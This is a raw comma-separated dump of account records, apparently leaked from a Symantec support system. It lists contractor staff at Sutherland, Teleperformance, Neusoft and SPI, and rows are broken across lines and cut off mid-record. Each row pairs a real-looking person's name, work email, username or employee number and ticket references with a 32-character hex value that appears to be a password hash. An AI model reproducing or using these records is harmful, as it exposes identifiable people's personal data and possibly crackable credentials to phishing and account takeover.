a779a75791f8062f5fb46a0445c2a2,Varghese,<blank>,Jobin_Varghese,Jobin,NULL,NULL,N
ULL
df7-4a77-9034-dbe9535a644a,<blank>,<blank>,Joseph_Mathew2@SUTH.COM,Sutherland,58
6f447447c84d66af2266442e64f36d,Mathew,<blank>,Joseph_Mathew2,Joseph,NULL,NULL,NU
LL
794-4576-b9b8-4d533a6127fa,<blank>,<blank>,Joseph_Rex@SUTH.COM,Sutherland,a155a2
ee593477fe6000c9d7af0b1408,Charles Royan,<blank>,Joseph_Rex,Joseph,NULL,NULL,NUL
L
1afc-4623-bf48-24d05554d1cb,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,831834a1e2ab7d2ff52fabf2fbd4e9ba,Nadar,<blank>,075789,Micheal,NULL,NU
LL,NULL
9d59-4172-8691-3209179d6a3b,SRB 19.05.2010,EMPROV,Symaccount@neusoft.com,Neusoft
,e28d49abbd4bc6f75fd577f230a86ee9,Li,<blank>,104697,Minghu,NULL,NULL,NULL
8ab-4bfd-9441-8326d6fa9ce5,<blank>,<blank>,JanMichael_Adan@SUTH.COM,Sutherland,b
f59b4c553bf8a0ab71a0f188d300eab,MichaelAdan,<blank>,JanMichael_Adan,Jan,NULL,NUL
L,NULL
d6a0-4ca7-8969-98d82220c64a,CRQ000000671046--vmd--23/05/2012,000-000,carolyn_ara
neta@suth.com,Sutherland,7c9fc44132ff153d31312dd373cf37e8,Araneta,<blank>,225912
,Carolyn,NULL,NULL,NULL
9228-4e67-9456-92e41faba043,<blank>,INC151150,accounts@symantec.teleperformance.
gr,Teleperformance Greece,ac70ac9af4028a4c7a38d8e9393f3bd3,Foris,<blank>,069677,
Erika,NULL,NULL,NULL
041-4bdf-9ae3-d337db52054f,<blank>,<blank>,JohnsonJayakumar_S@SUTH.COM,Sutherlan
d,14f9a372884ece0fd307e656a42ce93c,S,<blank>,JohnsonJayakumar_S,Johnson Jayakuma
r,NULL,NULL,NULL
b81-4648-afa0-41e01870ffcf,<blank>,<blank>,Jonathan_Grado@SUTH.COM,Sutherland,91
534d306e3871e0dc8b3607e85dbb16,Grado,<blank>,Jonathan_Grado,Jonathan,NULL,NULL,N
ULL
b885-47db-b873-bd210ccf7a29,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464950,d299c76cd6974632bfd08ec4fffc4660,Delmiguez,<blank>,123268,E
dsel Casundo,NULL,NULL,NULL
0ba4-4a23-a7ec-b24eb65cdb58,bpr-23-03-10,INC137437,tools_id@symantec.suth.com,su
therland,2d9101103ad944c55b7f7809676f5303,George,<blank>,089304,Charlie Michael,
NULL,NULL,NULL
2aa0-4c55-9d56-6434e3f6ae0f,SRB 27.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherland,7adc9ae5bfd8eddaacb74ea84790f8fd,Ramanathan,<blank>,087647,Kannappan,
NULL,NULL,NULL
e20a-4f56-b2a4-fdb48f1c2e9a,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607028 - PR - 27th March 2012,eb34a2096b2f042e0f2f5165d6097eef,Chawan,<blank>,22
3119,Mahesh Laxman ,NULL,NULL,NULL
5a5-4450-ba6d-69c75903896b,<blank>,<blank>,Kanchana_P1@SUTH.COM,Sutherland,3f144
f8bf538a718ad7bdd76b7531b12,P,<blank>,Kanchana_P1,Kanchana,NULL,NULL,NULL
8d49-4202-b931-666301c24eb1,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692571 - PR - 12th June 2012,32942bc144f1d91c0377b6ad317bdb81,Concepcion,<bla
nk>,226652,John Allen ,NULL,NULL,NULL
aa2-462e-aa6a-aaa369d65b3c,<blank>,090884,Tools_id@symantec.suth.com,<blank>,9cc
e91678cc25c9e5ad3aae6a3b26628,A,<blank>,ruban_a,Ruban,NULL,NULL,NULL
7d7-46b3-977a-cb32714525ea,<blank>,<blank>,KarlaSuzanne_Matela@SUTH.COM,Sutherla
nd,5ce6b8033ad9a96b9612f93f23b5549d,RamirezMatela,<blank>,KarlaSuzanne_Matela,Ka
rlaSuzanne,NULL,NULL,NULL
ffb7-458b-a217-08f85ce209d9,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,6d7d20d8982da0914c5cbac748142019,George,<blank>,086109,Varghese,NULL,NULL,NULL
f339-4d88-8ceb-b81015a0cc33,BPR-11/12/09,INC70690,tools_id@symantec.suth.com,Sut
herland,79c7f8a24222fb0590afdfe3d8a33601,C,<blank>,074465,vVimala,NULL,NULL,NULL
257b-4659-ba12-6d5ecf815178,CRQ000000602032--vmd--22/03/2012,<blank>,johnmichael
_tumali@Suth.com,Sutherland,4c04b101f84baf799823cebe01f0e53a,Tumali,<blank>,2226
36,John Michael,NULL,NULL,NULL
a116-4933-9435-f7e1ec1d48a1,CRQ000000602035--vmd--22/03/2012,<blank>,ramonisrael
_villar@Suth.com,Sutherland,c3be42400fb98691a590155692be8217,Villar,<blank>,2226
37,Ramon Israel,NULL,NULL,NULL
3c6-4d77-ab61-be309e305ec3,<blank>,<blank>,Karthikeyan_C@SUTH.COM,Sutherland,c5b
ba0170afd1cc72178a062bb66ed98,C,<blank>,Karthikeyan_C,Karthikeyan,NULL,NULL,NULL
ff31-44d2-b4c0-d9fcfade389d,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692574 - PR - 12th June 2012,a0bcc23e3c032d15833d44603c1e1482,Tropicales,<bla
nk>,226653,Lorraine ,NULL,NULL,NULL
dd1f-47d0-8771-c42532e26ea1,SRB 18.06.2010,INC000000197662,tools_id@symantec.sut
h.com,Sutherland,e44e91ac18b8063819284e9ae1557da2,Sanchez,<blank>,080550,Michael
,NULL,NULL,NULL
ca67-4869-ae03-b9459b9de00e,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692578 - PR - 12th June 2012,7ec7f5aa2a7d033540459674664990ab,Liclican,<blank
>,226654,Shiela Marie ,NULL,NULL,NULL
e0e-46b0-8443-6d85254751ed,<blank>,<blank>,Kavita_Tambe@SUTH.COM,Sutherland,cf24
58b7602b0e76f1ae823d2c49e2fb,Tambe,<blank>,Kavita_Tambe,Kavita,NULL,NULL,NULL
0076-49d6-9d08-d58ed05dfaca,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a9f06be86d792232a1fd820320c2e7aa,Dwaraka,<blank>,086185,Ganesh,NULL,NULL,NULL
d59-448a-89ba-31b9f3426f41,<blank>,<blank>,KenI_Pott@SUTH.COM,Sutherland,e7617cf
00a91d251c2f9e8aa04fb705a,I Pott,<blank>,KenI_Pott,Kenneth,NULL,NULL,NULL
e02-47e1-8eb2-cc2100c227bf,WS 16-07-2010,INC213497,KevinM_Stewart@SUTH.COM,Suthe
rland,ee7fc69166a867328ac0b8d1d071e28d,M Stewart,<blank>,KevinM_Stewart,Kevin,NU
LL,NULL,NULL
03e2-49e6-9642-f71b7e656b09,CRQ000000349498-CLNP-04/10/2011,00-000,tools_id@syma
ntec.suth.com,Sutherland,773921f92496af478155e437a159321c,E,<blank>,075730,Sures
h,NULL,NULL,NULL
be4-4f4c-9019-220159995480,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,Su
therland,fa3128bf5bf844030f8be70568087c15,Culbertson,<blank>,Kim_Culberson,Kim,N
ULL,NULL,NULL
8e5-4773-83aa-fe84f3385213,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,209b367c3bb8b73605f2d981f549a7f9,M,<blank>,Kiruba_M,Kiruba,NULL,NULL,NULL
a8e-4f68-9156-9d3a21912f5a,<blank>,<blank>,KithyLeen_Pontras@SUTH.COM,Sutherland
,2a4e3ebbaec256afa2694d2837ca46dc,LeenPontras,<blank>,KithyLeen_Pontras,Kithy,NU
LL,NULL,NULL
bfeb-466c-810b-d3e47e570bfa,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,0e47f0f98930f22e7a3c3e450f0fc7bd,M,<blank>,075294,Rajesh,NULL,NULL,NULL
46b3-426c-94c7-0dc7d8f923ce,CRQ000000690973--vmd--12/06/2012,<blank>,bchristense
n@symantec.teleperformance.gr,teleperformance,4d613af40b512d01a8ecc2938477aa45,C
hristensen,<blank>,226576,Bart,NULL,NULL,NULL
5e8f-4ee4-b08d-5eaf7cabaf55,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,d8875fb5c5d3c05d8bcac826d2128863,Abdulla Ashraf,<blank>,086106,Shahil,NULL,NULL
,NULL
fcc8-4cc2-888c-98e5eec95169,CRQ000000671048--vmd--23/05/2012,000-000,kishiajane_
argenio@suth.com,Sutherland,23c25fdba58e65fe2bf735c9ed93e041,Argenio,<blank>,225
913,Kishia Jane,NULL,NULL,NULL
659-4b54-97a1-66be81f045b5,<blank>,<blank>,Krishnaram_R@SUTH.COM,Sutherland,ba82
388062dc61405981d08621e59924,R,<blank>,Krishnaram_R,Krishnaram,NULL,NULL,NULL
e4d-4c55-be60-06d33c169704,<blank>,<blank>,Kristine_Luayon@SUTH.COM,Sutherland,a
0377bc5488db9340f5e0f4c7047bbdd,Luayon,<blank>,Kristine_Luayon,Kristine,NULL,NUL
L,NULL
229-4c00-8d69-fb70091bddb5,<blank>,<blank>,KristineJoy_Barrientos@SUTH.COM,Suthe
rland,8bb3b241c964565ed8fdcdc5bddeaa4e,CatalunaBarrientos,<blank>,KristineJoy_Ba
rrientos,KristineJoy,NULL,NULL,NULL
6e0e-4b64-b91b-f06eb65311ea,sms 01.10,INC213497,tools_id@symantec.suth.com,<blan
k>,875178dc985143a32cf2421401db23ed,Magdoboy,<blank>,075454,Elbert,NULL,NULL,NUL
L
b0f-433e-996b-605e4a1eb53c,<blank>,2635104,KshemaPrasath_S@SUTH.COM,Sutherland,e
af9bab40d87c8a6fc355425ba3feeef,S,<blank>,KshemaPrasath_S,Kshema Prasath,NULL,NU
LL,NULL
8908-4c58-a376-b03769819423,CRQ000000467035 SP 22 Dec 2011,000-0000,Mark.Jansen@
teleperformance.nl,Teleperformance,a015570af3dd5eca7ec37ffea513dde5,Jansen,<blan
k>,071621,Mark,NULL,NULL,NULL
7a9d-4676-ab3d-fe82ad9355bf, CRQ000000486370 CLNP 04 Jan 2011,000-0000,tools_id@
symantec.suth.com,Sutherland,bcaaebc3d8f4aac04f6f1da89b37d75c,Dublin,<blank>,123
643,Eleonor,NULL,NULL,NULL
f4a-40d9-82f0-63c1f0752b84,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,ee18d9b0143a3e497c5563788b99dc42,P,<blank>,Kumudhavalli_P,Kumudhavalli,NULL,NUL
L,NULL
61ac-4d5a-a356-939696162313,CRQ000000671050--vmd--23/05/2012,000-000,irene_barol
a@suth.com,Sutherland,d45e7f7a6811f73e160e08d9d138d169,Barola,<blank>,225918,Ire
ne,NULL,NULL,NULL
8248-4a6a-ad4b-d2bc77091b5d,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607032 - PR - 27th March 2012,3cb4c113cccbd766cadf4e8d7b9cce95,Samani,<blank>,22
3120,Dhiren,NULL,NULL,NULL
7da-4a3f-b6d1-58ab023d7e85,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,260089e5fffa41af94a11943751e5270,M,<blank>,LakshmikantSharma_M,Lakshmikanth Sha
rma,NULL,NULL,NULL
e782-43f1-a7a0-f9eedbdd4e30,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607035 - PR - 27th March 2012,eaefbe707c785030a8d13042aabaff20,Parab,<blank>,223
121,Ganpat,NULL,NULL,NULL
ff3f-483d-9919-41080897f351,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,91da06fb46a21b9dba3d45a93aca3600,Dabholkar,<blank>,076001,Zion,NULL,NULL,
NULL
6d29-4474-9dfe-51e776b333d9,CRQ000000671073--vmd--23/05/2012,<blank>,jennifer_ca
pino@suth.com,Sutherland,7440672ab7adbe4a9b76654b1b88aa4a,Capino,<blank>,225920,
Jennifer,NULL,NULL,NULL
ba5-44cf-a637-28e709bd0954,<blank>,EMPROV ,tools_id@symantec.suth.com,Sutherland
,1dd6bc433466d6f5b648b7313b82a5d2,Gazula,<blank>,091806,SriHarsha,NULL,NULL,NULL
7ad-4de3-b5ea-79ae5acd01ab,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,6c6c28bd60ccdf8def772a801a15aeac,Joy,<blank>,Lijin_Joy,Lijin,NULL,NULL,NULL
9d4-4228-8386-75211f0afd80,<blank>,<blank>,Lijo_Johnny@SUTH.COM,Sutherland,766c8
94fdf1f8773942bea2bc4f7d015,Johnny,<blank>,Lijo_Johnny,Lijo,NULL,NULL,NULL
cae-4919-9def-889e54c66208,<blank>,<blank>,JudePritish_Christus@SUTH.COM,Sutherl
and,0f955c881314b5052f6086bd4f514ba7,Christus,<blank>,JudePritish_Christus,Jude,
NULL,NULL,NULL
0c25-40c3-8570-fc3e7e9d49fe,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607060 - PR - 27th March 2012,4b4dd7763e1e8b331257922e552e45ba,Punjabi,<blank>,2
23127,Nicky ,NULL,NULL,NULL
6b21-4066-a461-8d81da7fe216,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,11bad44c3cdb0ef709ce5d039fc4bcf7,Purushothaman,<blank>,
102097,Kishore,NULL,NULL,NULL
dc8-405f-891f-9cc7d4a048a3,<blank>,<blank>,Karthikeyan_M6@SUTH.COM,Sutherland,fa
9c277fbe2499b62c042d377871135a,M,<blank>,Karthikeyan_M6,Karthikeyan,NULL,NULL,NU
LL
e56-4433-8959-6fdb4f8441e8,<blank>,<blank>,KEERCHE_Mendoza@SUTH.COM,Sutherland,1
2bfebfdcb06c274b4d706d1cc394c6f,Mendoza,<blank>,KEERCHE_Mendoza,Keerche,NULL,NUL
L,NULL
88b-446f-9357-57632c6802ed,<blank>,<blank>,Keerthiraj_T@SUTH.COM,Sutherland,1428
29b2ecac18747309773b1a94dfc0,T,<blank>,Keerthiraj_T,Keerthiraj,NULL,NULL,NULL
7e60-478e-916e-4d11ce6aaf55,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,0ec598ba15b091101897bfe45a7790e6,Gay Malabarbas,<blank>
,075540,Angel,NULL,NULL,NULL
34ef-4a4f-9525-751fe2abf383,SRB 19.05.2010,EMPROV,Symaccount@neusoft.com,Neusoft
,6b30060c77be48218d439e2d321dc03e,Xia,<blank>,105204,Senwei,NULL,NULL,NULL
be6f-4153-ab95-d5b0019048df,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,85fb15216140eeaa3ba93feb452b316b,Jayakumar,<blank>,1046
40,Ramya,NULL,NULL,NULL
d17-4f0d-a1fb-8d3c317f722f,<blank>,<blank>,Kiran_Ramachandran@suth.com,Sutherlan
d,5c0d22118567dd96ea01633fb7c5e3ed,Ramachandran,<blank>,Kiran_Ramachandran,Kiran
,NULL,NULL,NULL
af9-4be8-85b7-989fe48041fc,<blank>,EMPROV,Suchit_Tripathy@symantec.com,Symantec,
9f8f91ac4cdc11a59d2e9f1c5de40bb5,Joseph,<blank>,092463,Maria,NULL,NULL,NULL
5e2-4851-b916-6f93c500579b,<blank>,<blank>,KishoreKumar_R2@SUTH.COM,Sutherland,c
35aa9a23479c874e6408e8d3a5ca879,R,<blank>,KishoreKumar_R2,Kishore Kumar,NULL,NUL
L,NULL
a7cb-451b-b05a-8ec416323232,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,8dbf6c0bc0ea10fe77b9757116c107a9,K D,<blank>,074711,Rubini,NULL,NULL,NULL
7f3-4dc4-872a-c3f9dc211650,<blank>,2614952,LeslyJean_Grancho@SUTH.COM,Sutherland
,26d98b8e47b758c440000e39349e173b,CalueGrancho,<blank>,LeslyJean_Grancho,LeslyJe
an,NULL,NULL,NULL
496a-4b8e-9395-2bcd990bd9b9,<blank>,<blank>,Roger_Dispolonjr@SPI.COM,PM - 6/14/2
012 -CRQ000000694524,a472ab89fd99e13f3cc2fd219682fcb8,Dispolon Jr.,<blank>,22672
5,Roger,NULL,NULL,NULL
9aa8-4c9b-8e64-2b4731f87631,<blank>,<blank>,Melchorii_Olivo@SPI.COM,PM - 6/14/20
12 - CRQ000000694568,7d40f379eba097f9402a4eeeca8bfb1b,Olivo,<blank>,226733,Melch
or II,NULL,NULL,NULL
2307-4141-93c9-60968aa47eb3,CRQ000000709695--vmd--26/06/2012,<blank>,marygrace_d
avid@suth.com,sutherland,b3f3fc539527cd7cc404292892ae15df,David,<blank>,226457,M
ary Grace,NULL,NULL,NULL
ee2-4124-a854-1c1f8c501c4d,<blank>,<blank>,LloydVonn_Gentapanan@SUTH.COM,Sutherl
and,d5ede98e005734802d0f7d314959b629,VonnGentapanan,<blank>,LloydVonn_Gentapanan
,Lloyd,NULL,NULL,NULL
c90e-4645-8aca-a5af65f4c2e4,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,78026554f8b2eb1266b3ba917b6771a2,Mhatre,<blank>,074748,Shailesh,NULL,NULL
,NULL
d713-4da6-a98f-5421952f3567,sms 29,INC213497,tools_id@symantec.suth.com,<blank>,
f8c22423ce0311d3f7b32d06cce77abb,Chadha,<blank>,074749,Manpreet,NULL,NULL,NULL
e9d-4001-b5ff-2e243cd71ba9,<blank>,<blank>,Lorena_Alfonso@SUTH.COM,Sutherland,0c
07a505fd48c31d5c2b4b84218f2d43,Alfonso,<blank>,Lorena_Alfonso,Lorena,NULL,NULL,N
ULL
64a2-45cf-a991-6378b7826703,VB=31/12/2010,<blank>,Katherine_Candelario@Symantec.
com,<blank>,0cbca006cb064b440f5cba01694f8d3c,Katherine Candelario,<blank>,111734
,Ma,NULL,NULL,NULL
fec-4553-93a3-7ff814d15500,<blank>,<blank>,Ma.Aileen_Fuggan@SUTH.COM,Sutherland,
a2a264145127fc021b6ed400edf0d7a9,AileenFuggan,<blank>,MaAileen_Fuggan,Ma.,NULL,N
ULL,NULL
547-4ba1-b869-8560b230911a,<blank>,<blank>,Madel_Alinea@SUTH.COM,Sutherland,ac34
f6eb105815231630383ab8c4c46d,Alinea,<blank>,Madel_Alinea,Madel,NULL,NULL,NULL
bc9-4479-9774-f6799864c076,<blank>,<blank>,Madhusoodhanan_S@SUTH.COM,Sutherland,
9e6febc582488d42389c8c94c68ba572,S,<blank>,Madhusoodhanan_S,Madhusoodhanan,NULL,
NULL,NULL
fb4-412b-8f1e-f869a0f36f68,<blank>,<blank>,Mahalakshmi_P1@SUTH.COM,Sutherland,1a
c36f0a1f9d3a540e20e2a2eb7e7b0c,Palaniswamy,<blank>,Mahalakshmi_P1,Mahalakshmi,NU
LL,NULL,NULL
25ff-4585-8489-22da220d1ec9,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,f93ad8ac09b0505c36255c5c856b9249,Ramachandran,<blank>,095799,GautamNair,NULL,NU
LL,NULL
e1ff-489f-9be5-0189f535d184,<blank>,<blank>,Warren_Guillermo@SPI.COM,PM - 6/14/2
012 - CRQ000000694527,a890b0f551abb99e39816c11715c3f89,Guillermo,<blank>,226726,
Warren,NULL,NULL,NULL
e0e-4d06-90a5-2ab23ed0e7fa,<blank>,<blank>,JulietPriya_K2@SUTH.COM,Sutherland,e3
5b0e2bb15867f3e4c82f040a63427e,K,<blank>,JulietPriya_K2,Juliet Priya,NULL,NULL,N
ULL
41eb-4c4a-a07b-1655155b1959,<blank>,<blank>,James_Ignacio@SPI.COM,PM - 6/14/2012
- CRQ000000694539,8b7f8cbbf779a0b5dce2e752f321ab4e,Ignacio,<blank>,226730,James
,NULL,NULL,NULL
9ab-487e-925b-842c58f202f2,<blank>,<blank>,Juvy_Lambid@SUTH.COM,Sutherland,b640e
8f2f2beace7a3d5e46f164bdd3c,Lambid,<blank>,Juvy_Lambid,Juvy,NULL,NULL,NULL
49fd-4221-9a9e-fb38acf19e7c,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,463f98bb56e20310ead1046658dbc987,G,<blank>,075295,Venkateshwaran,NULL,NUL
L,NULL
7e1a-457f-9ebb-4b9499eb523b,<blank>,<blank>,Michealangelo_Lucas@SPI.COM,PM - 6/1
4/2012 - CRQ000000694545,60d15b66fc3cf6b2431079e99c07aab1,Lucas,<blank>,226732,M
icheal Angelo,NULL,NULL,NULL
a11-4941-a368-b8a53942bdf4,<blank>,<blank>,KalyanVarma_U@SUTH.COM,Sutherland,c20
660052f54d766d92d6abf56923a8d,U,<blank>,KalyanVarma_U,Kalyan Varma,NULL,NULL,NUL
L
c3ae-4d95-9291-d5ba5dc5ffec,<blank>,<blank>,Ryanne_Ortiz@SPI.COM,PM - 6/14/2012
- CRQ000000694574,5a9bdc93859451e92e3c81d851dddc0c,Ortiz,<blank>,226735,Ryanne,N
ULL,NULL,NULL
4f4-4165-9be4-4b7d0b392bae,<blank>,<blank>,KamalaKannan_N@suth.com,Sutherland,6a
a3598a458f2b55fc9f7b19ef93c10b,Narasimhan,<blank>,KamalaKannan_N,KamalaKannan,NU
LL,NULL,NULL
b97-4a9a-8a19-bdd13a67558d,<blank>,<blank>,KarenLou_Garcia@symantec.suth.com,Sut
herland,83fefcb4996dcf490d6e26d5f6b9a62a,LouGarcia,<blank>,KarenLou_Garcia,Karen
,NULL,NULL,NULL
447c-471f-a218-2a4482c6a9b6,SRB 27.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherland,3eb84f62240bdc133081b351aa61cf4e,Asharaf,<blank>,087652,Nezif,NULL,NU
LL,NULL
9e31-4037-aab2-9e64ccafce79,CRQ000000709695--vmd--26/06/2012,<blank>,moushmi_ram
akrishnan@suth.com,sutherland,600258c98838253795f76cfad270b636,Ramakrishnan,<bla
nk>,095045,Moushmi,NULL,NULL,NULL
a4ac-45bf-b236-75d467ad4909,<blank>,<blank>,dgaugere@symantec.teleperformance.gr
,CT - 12/09/2012 - CRQ000000801498,c74e7c2e9694771e693bb71213950252,Gaugere,<bla
nk>,229997,Dita,NULL,NULL,NULL
9740-4a7b-8d89-dcb1b6ede17a,CRQ000000709695--vmd--26/06/2012,<blank>,rajesh_kuma
ran@suth.com,sutherland,3a11e8e22e7505b88087d2a863904c2a,Kumaran,<blank>,109119,
Rajesh,NULL,NULL,NULL
0f0-4b5c-b881-baa911f1177d,<blank>,<blank>,Karthick_M3@SUTH.COM,Sutherland,ac95c
5eeeaf631fd2c1ed3ced3b21e45,M,<blank>,Karthick_M3,Karthick,NULL,NULL,NULL
88e2-4d06-acfc-976363989f64,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a3ea43eca7cd026f3b1137993f70cf3c,Narayanasamy,<blank>,086204,Prashannabalaji,NU
LL,NULL,NULL
2444-4e45-a111-6c1e4b959cab,CRQ000000709695--vmd--26/06/2012,<blank>,suresh_s1@s
uth.com,sutherland,a9e62271922aa7217f64946ad7612c91,s,<blank>,081049,Suresh,NULL
,NULL,NULL
ea6-4036-8580-a9821b09a578,<blank>,86263,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",980c9c855ccbaeba36cac5ac85c850d5,Sundaram,<blank>,balacha
nder_sundaram,Balachander,NULL,NULL,NULL
c92-41a9-b5f0-00ddd71c5563,<blank>,2630245,Keith_Printess@symantec.SUTH.COM,Suth
erland,55892846a8786824084afe63f994bb7c,Printess,<blank>,Keith_Printess,Keith,NU
LL,NULL,NULL
aa35-4e25-a9ff-eb67321c95f9,<blank>,<blank>,daniel_ofrecia@suth.com,CT - 28/06/2
012 - CRQ000000711259,95d1cc1ad6b12fdad1fcee3933e06d53,Ofrecia,<blank>,226988,Da
niel,NULL,NULL,NULL
0c6-4c2d-a76f-5bd318680666,<blank>,<blank>,Krishna_K3@SUTH.COM,Sutherland,0ec8b9
b4c0fd656d078d370cbae6e876,K,<blank>,Krishna_K3,Krishna,NULL,NULL,NULL
00e3-495c-a21d-c152b67346ec,CRQ000000718011--VMD--03/07/2012,<blank>,gopinath_d@
SUTH.COM,Sutherland,5ba50f189a23c4377ab327e46ed44d09,D,<blank>,227375,Gopinath,N
ULL,NULL,NULL
d6a-4a3d-bc9a-d49cdc2b0362,<blank>,<blank>,Lee-AnnP_Carter@SUTH.COM,Sutherland,e
68bf15416f793f7657877f3a8a532cb,P Carter,<blank>,LeeAnnP_Carter,Lee-Ann,NULL,NUL
L,NULL
613c-4a31-be00-243bb5d84740,CRQ000000718017--vmd--3/07/2012,<blank>,antony_chris
toper@suth.com,sutherland,7c06049661e1a28cd1c5f1aee8cacaac,Christoper,<blank>,22
7377,Antony,NULL,NULL,NULL
5e4-4ac3-b171-5b12985f5977,<blank>,<blank>,Leslie_Tan@SUTH.COM,Sutherland,4cf49d
7d94aa52e112b2c0d88dc1fab7,Tan,<blank>,Leslie_Tan,Leslie,NULL,NULL,NULL
a11f-4084-a81b-583453a53b77,CRQ000000718020--vmd--03/07/2012,<blank>,rishu_kumar
@suth.com,sutherland,13b3b0b4ce8e26de5dcf0e682a128944,Kumar,<blank>,227383,Rishu
,NULL,NULL,NULL
bf4-48a8-819f-b983f7b05830,<blank>,<blank>,LokaPavani_Y@SUTH.COM,Sutherland,4e46
ffa4d03c1cb1fedf09a3b9e9dd7f,Sathya Narayana,<blank>,LokaPavani_Y,Loka,NULL,NULL
,NULL
acc-4564-b3a5-493979438671,<blank>,<blank>,Ma.Estella_Mejia@SUTH.COM,Sutherland,
bdc97e6cc95334c3e6332b3503ed4f8e,EstellaMejia,<blank>,MaEstella_Mejia,Ma.,NULL,N
ULL,NULL
853a-4b62-a6a5-326e9cc34545,<blank>,<blank>,Johnpaul_Lee@SPI.COM,PM - 6/14/2012
- CRQ000000694660,71a7fef574d3672623ff33d787c9d88b,Lee,<blank>,226750,John Paul,
NULL,NULL,NULL
504a-4280-b072-6924b0ddf066,VB=31/12/2010,<blank>,BonnibelJune_Vincoy@Symantec.c
om,<blank>,207c3b185179b7117228685d02a9b32e,Pairat Vincoy,<blank>,111730,Bonnibe
lJune,NULL,NULL,NULL
fa70-4559-bb76-d7a41a39c140,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,850bb0b46b49658a8c2c18ba59b06f1a,Barthy,<blank>,075661,
Sujay,NULL,NULL,NULL
3682-4a6f-ad48-838bb1061f5e,CRQ000000479738 CLNP 30 Dec 2011,000-0000,Jenni_Fred
lund@symantec.com,Symantec.com,acca6407fc74a51d746db1872cc6cfb8,Fredlund,<blank>
,119138,Jenni,NULL,NULL,NULL
927d-4ff7-9be1-b3b1e42634b0,sms 29,INC213497,tools_id@symantec.suth.com,<blank>,
efa8b387a3c78c11d81aa4caef1e6b67,Kaye Obeso,<blank>,080966,Charo,NULL,NULL,NULL
521-4cb4-88c2-924c6a611ce0,<blank>,<blank>,Manjeet_Singh@SUTH.COM,Sutherland,e28
c0af88077e819d9af1b4e770b2724,Singh,<blank>,Manjeet_Singh,Manjeet,NULL,NULL,NULL
82b-4cd5-80ea-d9ec9004c4e9,<blank>,<blank>,Maran_B@SUTH.COM,Sutherland,771b7b39a
2c9842e49d8205e2481c5c2,B,<blank>,Maran_B,Maran,NULL,NULL,NULL
8bd-40e2-9699-f3661736415b,<blank>,<blank>,MarcLester_Ibanez@SUTH.COM,Sutherland
,e048689b8688ddbad22f94003de5e042,LesterIbanez,<blank>,MarcLester_Ibanez,Marc,NU
LL,NULL,NULL
12d-4c18-b50d-86909f51a80c,<blank>,<blank>,Maria_Lopez@SUTH.COM,Sutherland,a2137
9803215d519191d2908bbfa14d6,Lopez,<blank>,Maria_Lopez,Maria,NULL,NULL,NULL
887a-4cd8-9287-60744297f53c,CRQ000000709695--vmd--26/06/2012,<blank>,daxlaurenti
s_antonin@suth.com,sutherland,1f580d267a77fc63685364d41007f826,AntoninoDe Leon,<
blank>,101627,DaxLaurentis,NULL,NULL,NULL
8c28-4a5f-a96a-9023565bc850,CRQ000000734348--vmd--17/07/2012,<blank>,tools_id@sy
mantec.suth.com,sutherland,2ced68af39f26a7d61c11cbddfbd8029,Miyajiwala,<blank>,2
27957,Mufaddal,NULL,NULL,NULL
db5-45a8-ae0d-2aeba70b2b13,<blank>,<blank>,Marian_Lapira@SUTH.COM,Sutherland,531
1ade46ae1fa7230e7a375552632f7,Lapira,<blank>,Marian_Lapira,Marian,NULL,NULL,NULL
e95f-4747-a649-43fe5018a5f3,<blank>,<blank>,rkazemi@symantec.teleperformance.gr,
CT - 12/09/2012 - CRQ000000801602,c3b3e2ff06f9a5ecd7bc2ec39bc216af,Kazemi,<blank
>,229998,Roxanna,NULL,NULL,NULL
77c-4a3f-823d-350f57c2cb85,sms 01.10,2614953,Tools_id@symantec.suth.com,Symantec
,897ab0269fd3cd46484dffc4912f1842,Lesmoras,<blank>,evangeline_lesmoras,Evangelin
e,NULL,NULL,NULL
520-42f6-814d-860dd85506c2,<blank>,<blank>,Maricar_Jimenez@SUTH.COM,Sutherland,7
552966602ef2ebfee4397fd02d641bf,Jimenez,<blank>,Maricar_Jimenez,Maricar,NULL,NUL
L,NULL
1ab-4d79-8fcf-8336bf155841,<blank>,<blank>,Maricel_Quitong@SUTH.COM,Sutherland,c
286af0eb909b0858df472a3841ff679,Quitong,<blank>,Maricel_Quitong,Maricel,NULL,NUL
L,NULL
bca-4568-b18c-10a9cf98b5eb,<blank>,<blank>,MarieKris_Dimol@SUTH.COM,Sutherland,d
4511e791936e71860fe85bfda856b14,KrisDimol,<blank>,MarieKris_Dimol,Marie,NULL,NUL
L,NULL
8e85-4901-a2f3-e150c70b3094,"CRQ000000830061 CLNP Oct 08,2012",000-0000,vanessa_
pabillano@symantec.com,Symantec,b1d263dde9d5f1f7639de2e57a4d19b7,Pabillano,<blan
